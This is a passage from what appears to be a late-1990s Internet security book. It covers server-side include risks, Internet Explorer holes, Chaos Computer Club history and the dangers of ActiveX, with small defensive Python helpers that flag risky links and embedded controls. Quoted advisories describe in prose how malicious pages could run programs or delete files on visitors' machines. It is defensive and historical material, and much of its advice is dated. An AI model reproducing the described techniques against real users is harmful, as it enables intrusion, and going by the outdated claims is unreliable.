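    def replace(match):
        return (Path(include_dir) / match.group(1)).read_text(encoding="utf-8")
    return INCLUDE.sub(replace, page_text)


def build_site(src_dir, out_dir, include_dir):
    """Write an expanded copy of every .html template into out_dir."""
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    for template in sorted(Path(src_dir).glob("*.html")):
        text = template.read_text(encoding="utf-8")
        expanded = expand_includes(text, include_dir)
        (out / template.name).write_text(expanded, encoding="utf-8")
```

The server then publishes only the output directory, with SSI parsing switched off.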

Basically, if you are an administrator and you do not have a complete understanding of how SSI works, do not use it (at least until you have learned how).

CAUTION: This advisory is not simply for UNIX system administrators! Many Web-server packages support server-side includes. For example, the NetWare Web Server supports a wide range of SSI commands and directives. This option can be set with the administration facility.

Microsoft Internet Explorer

So many holes have been found in Microsoft Internet Explorer that one scarcely knows where to start. However, I want to run through them quickly. You may wonder why I have waited until this chapter to address Internet Explorer. My reasoning is largely based on the fact that some of the holes in Internet Explorer are related to ActiveX technology.

Some explanation is in order here; if I omit such explanation, I will be charged by Microsoft with false reporting. The corporation is in an extremely defensive position these days, and not without reason. Here, then, is the mitigating information:

Microsoft is well known for its ability to create attractive, eye-pleasing applications. Moreover, such products are designed for easy use to allow even the most intimidated individual to grasp the basic concepts within a few hours. In this respect, Microsoft has evolved much in the same way as Apple Computer. Consider, for example, the incredible standardization of design that is imposed on products for use in the Microsoft environment.

In the Microsoft world, menus must be at least somewhat consistent with general Windows design. Thus, almost any application designed for Microsoft Windows will have a list of menus that runs across the top of the program. Three menu choices that you will invariably see are File, Edit, and Help (other menu choices that are still very popular but appear less frequently include View, Tools, Format, and so forth). By designing applications that sport such menus, Microsoft ensures that the learning curve on those applications is minimal. In other words, if you know one Microsoft program, you pretty much know them all. (This is similar to the way every application melts its menus into the bar at the top of the MacOS desktop.)

Microsoft has thus created its own standards in a market that previously adhered to few rules. In this respect, Microsoft has revolutionized the PC computing world. Furthermore, because Microsoft products are so popular worldwide, programmers rush to complete applications for use on the Microsoft platform. Along that journey, programmers must strictly adhere to design standards set forth by Microsoft--well, they must if they seek that approval sticker on the box. If the U.S. Attorney General is looking for an antitrust issue, she might find one here.

Moreover, Microsoft has put much effort into application integration and interoperability. That means an Excel spreadsheet will seamlessly drop into a Word document, an Access database will interface effortlessly with a Visual Basic program, and so on. All Microsoft products work in an integrated fashion.

To perform such magic, Microsoft designed its products with components that meet certain criteria. Each of these applications contains building blocks that are recognizable by the remaining applications. Each can call its sister applications through a language that is common to them all. This system gives the user an enormous amount of power. For example, one need not leave an application to include disparate types of media or information. This design increases productivity and provides for a more fluid, enjoyable experience. Unfortunately, however, it also makes for poor security.

Internet Explorer was designed with this interoperability in mind. For example, Internet Explorer was, at the outset, more integrated with the Windows operating system than, say, Netscape's Navigator. Mr. Gates undoubtedly envisioned a browser that would bring the Internet to the user's desktop in the same manner as it would a local application. In other words, Internet Explorer was designed to bring the Internet to the user in a form that was easy to understand, navigate, and control. To its credit, Microsoft's merry band of programmers did just that. The problem with Microsoft's Internet Explorer, then, is that it fulfills its purpose to the extreme.

In a period of less than two weeks in early 1997, Internet Explorer was discovered to have three serious security bugs:

Students at a university in Maryland found that they could embed an icon on a Web page that would launch programs on the client user's computer. Microsoft posted a public advisory on this issue on its WWW site. In it, the company explained:

If a hacker took advantage of this security problem, you could see an icon, or a graphic in a Web page, which is, in fact, within a regular Windows 95/Windows NT 4.0 folder of the Web site server or your computer. The hacker could shrink the frame around the icon or graphic so that you would think it was a harmless, when in fact it allows you or anyone else to open, copy, or delete the file, or run a program that could, if the author has malicious intent, damage your computer. You can launch the program because the folder bypasses the Internet Explorer security mechanism.

Cross Reference: Microsoft's public advisory, Update on Internet Explorer Security issues UMD Security Problem, can be found on the Web at http://www.microsoft.com/ie/security/umd.htm.

Several sources determined that one could launch programs on the client's machine by pointing to either a URL or an LNK file.
Folks at A.L. Digital, a London-based firm, determined that Microsoft's Internet Explorer contained a bug that would allow a malicious Java applet to steal, corrupt, or otherwise alter files on the client's machine.

Each of these holes is Class A in character--that is, they allow a remote site to access or otherwise manipulate the client's environment. The risk represented here is tremendous.

To its credit, Microsoft responded quickly to each instance. For example, the second hole was acknowledged within hours of its discovery. The authors of that advisory did not mince words:

...this problem concerns the ability of a programmer to write code in a Web page that uses Internet Explorer 3.x versions to access a Web page hyperlink that points to a .LNK (a Windows shortcut file) or .URL file. Pointing to that .LNK or .URL could launch a program or an executable that could cause damage to a computer.

Cross Reference: Microsoft's advisory about the second hole, "`Cybersnot' Security Problem," can be found on the Web at http://www.microsoft.com/ie/security/cybersnot.htm.

The fix for that problem was also posted. If this is the first you have heard of this problem (and you use Internet Explorer), you should immediately download the patch.

Cross Reference: The patch for the hole discussed in Microsoft's advisory, "`Cybersnot' Security Problem," can be found on the Web at http://www.microsoft.com/msdownload/ie301securitypatch.htm.
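For administrators who want to check their own pages (or pages passing through a proxy) for links of the kind described in that advisory, a simple test on the link target is a start. The Python below is a minimal sketch; is_risky_link and RISKY_SUFFIXES are hypothetical names, and the check covers only the two file types named in the advisory. It is no substitute for the patch.

```python
from urllib.parse import unquote, urlsplit

# The two file types named in the advisory quoted above.
RISKY_SUFFIXES = (".lnk", ".url")


def is_risky_link(href):
    """Return True if the link's path ends in .lnk or .url (any case)."""
    # Only the path is examined; query strings and fragments are ignored.
    path = unquote(urlsplit(href).path)
    return path.lower().endswith(RISKY_SUFFIXES)
```

The path is percent-decoded before the comparison so that a suffix disguised as %2Elnk is still caught.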

News of these holes rocked the computing communities, which were still reeling from earlier holes. Examine this advisory from Dirk Balfanz and Edward Felten of Princeton University, delivered in August 1996:

We have discovered a security flaw in version 3.0 of Microsoft's Internet Explorer browser running under Windows 95. An attacker could exploit the flaw to run any DOS command on the machine of an Explorer user who visits the attacker's page. For example, the attacker could read, modify, or delete the victim's files, or insert a virus or backdoor entrance into the victim's machine. We have verified our discovery by creating a Web page that deletes a file on the machine of any Explorer user who visits the page.

Cross Reference: The advisory issued by Dirk Balfanz and Edward Felten can be found at http://geek-girl.com/bugtraq/1996_3/0394.html.

That instance prompted the Felten team to undertake a full security analysis of Internet Explorer. To my knowledge, the results have not yet been released.

Cross Reference: Although the results of the Felten team's analysis have not yet been released, their research page is located at http://www.cs.princeton.edu/sip/Research.html.

It is clear that, for the moment, Microsoft Internet Explorer is still cutting its teeth in terms of Internet security. What makes the problem so insidious is that only those users who are truly security aware receive such information as breaking news. The majority receive such information from third parties, often long after holes have been discovered. This is of major concern because nearly all of the holes found in Internet Explorer have been Class A.

ActiveX

Microsoft Corporation has put a great deal of effort into selling ActiveX to the public. However, even without examining the security risks of ActiveX (and there are some serious ones), I can tell you that ActiveX has its pitfalls. Here are two very practical reasons not to use ActiveX:

For the moment, only those using Microsoft Internet Explorer benefit from ActiveX. Hundreds of thousands (or even millions) of people will be unable to view your page in its fully functional state.
Even those sites that have the capability to view ActiveX may purposefully screen it out (and forbid their users to accept ActiveX controls). Many sites (as you will see) have taken a very active stance against ActiveX because it is insecure.

A recent article by Ellen Messmer in Network World provides some insight into the sentiments of private corporations regarding ActiveX:

Like many companies, Lockheed Martin Corp. has come to rely on Microsoft Corp. technology. But when it comes to Lockheed's intranet, one thing the company will not abide is ActiveX, a cornerstone of Microsoft's Web efforts. The reason? ActiveX can offer virus writers and hackers a perfect network entree. `You can download an ActiveX applet that is a virus, which could do major damage,' explains Bill Andiario, technical lead for Web initiatives at Lockheed Martin Enterprise Information Systems, the company's information systems arm. `Or it could grab your proprietary information and pass it back to a competitor, or worse yet, another country.'

Cross Reference: Ellen Messmer's "ActiveX Marks New Virus Spot" (Network World) can be found on the Web at http://www.nwfusion.com/.

The fears of the corporate community are well founded. ActiveX technology is (at least for the moment) unquestionably a threat to Internet security. Just ask the Chaos Computer Club, a group of hackers centered in Hamburg, Germany. The group gained international fame for several extraordinary exploits, including breaking into NASA. Some of the more bizarre exploits attributed to this group include

Publishing electronic mail addresses and telephone numbers of French politicians. This information was provided to hackers across the European continent. The purpose? To temporarily incapacitate the telecommunications systems of political and corporate entities in France in protest of a French nuclear test.
Creating one of the earliest implementations of a sniffer. Reportedly, the CCC had placed a password-capture program on a network populated by VAX security specialists. Incredibly, it is reported that Kevin Mitnick inadvertently discovered the program while rifling through the security experts' mail.

Here is a classic message posted in February 1988, related to an episode where the rumor of a CCC attack generated panic (the message was posted by Jerry Leichter, then a student at Yale University):

A week or so ago, the Chaos Computer Club of West Berlin announced that they were going to trigger trojan horses they'd previously planted on various computers in the Space Physics Analysis Network. Presumably, the reason for triggering the trojan horses was to throw the network into disarray; if so, the threat has, unfortunately, with the help of numerous fifth-columnists within SPAN, succeeded. Before anybody within SPAN replies by saying something to the effect of "Nonsense, they didn't succeed in triggering any trojan horses," let me emphasize that I said the THREAT succeeded. That's right, for the last week SPAN hasn't been functioning very well as a network. All too many of the machines in it have cut off network communications (or at least lost much of their connectivity...

Cross Reference: Find Jerry Leichter's posting in its entirety at http://catless.ncl.ac.uk/Risks/6.27.html.

Extraordinary. In the past, various intelligence agencies have attempted to infiltrate the CCC through a wide range of means. Such agencies have reportedly included the French secret police. The French Direction de la Surveillance du Territoire (a domestic intelligence agency) allegedly used an agent provocateur in an attempt to gather CCC supporters:

For years Jean-Bernard Condat has undoubtedly been France's best-known computer hacker. Appearing on television talk shows, launching provocative operations and attending computer seminars, he founded the Chaos Computer Club France (CCCF) in 1989 as France's answer to the renowned Chaos Computer Club in Germany. French journalist Jean Guisnel revealed this week in a book entitled Guerres dans le Cyberespace, Internet et les Services Secrets (Cyberspace War, Internet and Secret Services) published by the Editions La Decouverte (ISBN 2-7071-2502-4) that Condat has been controlled from the outset by the Direction de la Surveillance du Territoire. A student in Lyons where he followed music and information technology courses, Condat was taken in hand by the local branch of the DST in 1983 after committing some "minor misdemeanor." The DST organized his participation in hacker meetings abroad.

Cross Reference: The previous paragraph is excerpted from A Computer Spy Unmasked: Head of the French Hackers Group was a Secret Service Agent (Indigo Publications), which can be found on the Web at http://www.sec.de/sec/news.cccfnarc.

In any event, the CCC has long been known for its often dramatic public feats of hacking and cracking. These feats have crippled more than one giant: some were telecommunications companies, and others were private corporations. In February 1997, the neck of Microsoft fell beneath the ax of the Chaos Computer Club. As reported on CNET:

On German national television, [the CCC] showed off an ActiveX control that is able to snatch money from one bank account and deposit it into another, all without the customary personal identification number (PIN) that is meant to protect theft.

Cross Reference: "ActiveX Used as Hacking Tool," by Nick Wingfield (CNET), can be found on the Web at http://www.news.com/News/Item/0,4,7761,4000.html.

This news caused Usenet and security mailing lists to explode. Heated arguments ensued between Microsoft users and the rest of the world. The word was out: ActiveX was totally insecure. Messages in security lists came from individuals demanding firewalls or other tools to filter ActiveX out at the router level. Moreover, there is a firm, named Aventail, that specializes in such filtering software.

Cross Reference: The entire chronology of these arguments can be found at http://www.iks-jena.de/mitarb/lutz/security/activex.en.html.

Cross Reference: If you are a system administrator, you should seriously consider contacting Aventail. They can be found on the Web at http://www.aventail.com/.
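To give a rough idea of what such filtering looks for, consider that ActiveX controls are embedded in a page with an OBJECT tag whose CLASSID attribute begins with clsid:. The following Python sketch merely reports those tags; it is my own illustration, not a description of how Aventail's (or anyone else's) product works, and the names ActiveXFinder and find_activex are hypothetical.

```python
from html.parser import HTMLParser


class ActiveXFinder(HTMLParser):
    """Collect CLASSID values from OBJECT tags that reference a CLSID."""

    def __init__(self):
        super().__init__()
        self.classids = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names before this call.
        if tag != "object":
            return
        for name, value in attrs:
            if name == "classid" and value and value.lower().startswith("clsid:"):
                self.classids.append(value)


def find_activex(html_text):
    """Return the CLASSID values of embedded controls found in html_text."""
    finder = ActiveXFinder()
    finder.feed(html_text)
    finder.close()
    return finder.classids
```

A filtering proxy built on this idea could refuse or rewrite any page for which find_activex() returns a non-empty list.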

So, What Is the Problem with ActiveX?

The problem with ActiveX was summed up concisely by the folks at JavaSoft:

ActiveX...allows arbitrary binary code to be executed, a malicious ActiveX component can be written to remove or alter files on the user's local disk or to make connections to other computers without the knowledge or approval of the user. There is also the risk that a well-behaved ActiveX component could have a virus attached to it. Unfortunately, viruses can be encrypted just as easily as ordinary code.

Cross Reference: The preceding paragraph is excerpted from "Frequently Asked Questions--Applet Security," which can be found on the Web at http://www.javasoft.com:80/sfaq/index.html#activex.

The problem seems more serious than it is. Only those who use the Microsoft platform can be real victims. This is because the majority of Microsoft products (NT excluded) do not provide access control. Thus, if a malicious ActiveX control breaks through, it has access to the entire hard drive of the user. In UNIX, file permissions and access control limit the damage. Under the UNIX environment, a malicious applet running as an ordinary user would get no farther than the files that user is permitted to touch.

Microsoft has fallen victim to its own efficiency. It has created a tool that is so open and so finely related to its operating system that it is, in effect, the ultimate security risk for Microsoft users.

Some forces at Microsoft have taken the position that the CCC incident proves that individuals should not accept unsigned code. That is, the folks at Microsoft have taken this opportunity to grandstand their plan to have all code digitally signed. However, this runs right back to the issue I discussed earlier about certificates and signatures. Why is Microsoft so intent on having everyone, including programmers, identify themselves? Why should a programmer be forced to sign his or her applications simply because ActiveX is not secure?

NOTE: In fact, even signed code is unsafe. It does not take a lot of effort to get code signed, and currently there is no mechanism to prevent malicious programmers from signing their code, whether that code is safe or not.

ActiveX technology should be redesigned, but that responsibility rests squarely on the shoulders of Microsoft. After all, the risks posed are significant only for Microsoft's own users. Remember that at least for the moment, Microsoft's Internet Explorer is the only browser that truly supports ActiveX. However, all that is about to change. ActiveX will soon become a developing, open standard, as noted by Mike Ricciuti and Nick Wingfield (CNET):

Representatives from more than 100 companies, including software makers and information system managers, today voted at a meeting held here to turn licensing, branding, and management of the ActiveX specification over to the Open Group, an industry consortium experienced in promoting other cross-platform technologies.

It is doubtful that ActiveX will ever be completely restricted from accessing portions of an individual's hard disk drive because of the relation the technology has with components like Visual Basic. Those familiar with Visual Basic know that certain commands within it allow you to control Microsoft applications from a remote location, even if you don't have a low-level (such as DDE) conversation with the targeted program. (The SendKeys function is a perfect example of such functionality.)

However, because the benefits of ActiveX technology are so very dramatic, it is likely that ActiveX will continue to gain popularity in spite of its security flaws. In the end, ActiveX is nothing but OLE technology, and that is at the very base of the Microsoft framework. By exploring this, you can gain some insight into what ActiveX can really do.

To begin to understand what OLE is about, consider this: OLE is a technology that deals with compound documents, or documents containing multiple types of data or media. In older, cut-and-paste technology, such elements (when extracted from their native application) would be distorted and adopt whatever environment was present in the application in which they were deposited (for example, dropping a spreadsheet into a word-processor document would jumble the spreadsheet data). In OLE, these objects retain their native state, irrespective of where they end up. When a document element ends up in an application other than its own, it is called an embedded object.

Each time you need to edit an embedded object, the original, parent application is called so the editing can take place in the element's native environment (for example, to edit an Excel spreadsheet embedded in a Word document, Excel is launched). However, in advanced OLE, the user never sees this exchange between the current application and the parent. The security implications of this are obvious. If an ActiveX control can masquerade as having been generated in a particular application, it can cause an instance of that application to be launched. After the application has been launched, it can be "remote controlled" from the ActiveX component. The implications of this are devastating.

So, Microsoft is faced with a dilemma. It has an excellent extension to the Web, but one that poses critical security risks. What remains is time--time in which Microsoft can come up with practical solutions for these problems. In the interim, you would be wise to disable ActiveX support in your browser. Otherwise, you may fall victim to a malicious ActiveX control. The danger posed by such a control dwarfs the dangers posed by Java applets. In fact, there is no comparison.

Summary

This book hardly scratches the surface of Internet security. However, I hope that some points have been made here. Between holes in operating systems, CGI scripts, TCP/IP daemons, browser clients, and now applets and extensions, the Internet is not a very secure place. Taking these factors in their entirety, the Internet is not secure at all. Yet individuals are now doing banking over the Net.

Between the resources provided in the preceding chapters and the appendixes yet to come, it is my hope that you'll find good, solid security information. You'll need it.